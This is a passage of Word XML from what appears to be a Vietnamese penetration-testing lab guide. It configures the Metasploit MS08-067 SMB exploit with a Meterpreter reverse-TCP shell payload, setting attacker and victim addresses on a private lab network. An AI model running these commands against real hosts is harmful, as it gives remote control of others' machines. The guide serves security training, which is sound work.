          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/smb/ms08_067_netapi) &gt; set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775CCFEC" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>payload =&gt; windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA17703" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/smb/ms08_067_netapi) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535F85AE" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/smb/ms08_067_netapi) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12984B04" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t> Module options (exploit/windows/smb/ms08_067_netapi):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77829405" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   Name     Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67756D2A" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   ----     ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE9CD16" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   RHOSTS   192.168.1.7      yes       The target address range or CIDR identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6D7CE4" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   RPORT    445              yes       The SMB service port (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255CFDA3" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7B22A3" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Payload options (windows/meterpreter/reverse_tcp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DECD1E8" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   Name      Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413D9383" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   ----      ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7250E772" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CBFEF8" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   LHOST                      yes       The listen address (an interface may be specified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410141FE" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   LPORT     4444             yes       The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684D7534" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E96341D" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635A2FC6" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E7A6DC" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   0   Automatic Targeting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F8F6EC" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/smb/ms08_067_netapi) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5425B3FE" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Thiết lập tham số </w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t> là địa chỉ máy Kali Linux đang chạy Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457705A5" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/smb/ms08_067_netapi) &gt; set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022053C7" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LHOST =&gt; 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3A9BB0" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(windows/smb/ms08_067_netapi) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7370BA" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00351B6D" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//Có thể thay đổi cổng 4444 thành cổng khác: 4141, 4123... để tránh xung đột</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B86C7C" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Thiết lập tham số </w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>RHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t> là địa chỉ của máy bị tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45268D84" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/smb/ms08_067_netapi) &gt; set RHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730FCAD4" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>RHOST =&gt; 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE52AF7" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/smb/ms08_067_netapi) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AE1AA0" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Module options (exploit/windows/smb/ms08_067_netapi):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13403E40" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   Name     Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A0D3BA" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   ----     ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE73C13" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   RHOSTS   192.168.1.7      yes       The target address range or CIDR identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F84C8A" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   RPORT    445              yes       The SMB service port (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9D2757" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FB3350" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEC3D88" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B017076" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214421A1" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   0   Automatic Targeting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCAF142" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/smb/ms08_067_netapi) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D964DA9" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Xác định </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>hệ điều hành đích (victim)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2E40B0" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/smb/ms08_067_netapi) &gt; show targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B744FD1" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Exploit targets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2826E164" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A17258" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AACA2F0" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   0   Automatic Targeting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF3AC87" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   1   Windows 2000 Universal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2E7AA2" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   2   Windows XP SP0/SP1 Universal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2823462F" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C484ECA" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   13  Windows XP SP2 Danish (NX)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0393CB" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   14  Windows XP SP2 German (NX)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D49A8AF" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Có thể chọn </w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Automatic Targeting</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD94EE4" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(ms08_067_netapi) &gt; set target 0</w:t>
      </w:r>
    </w:p>
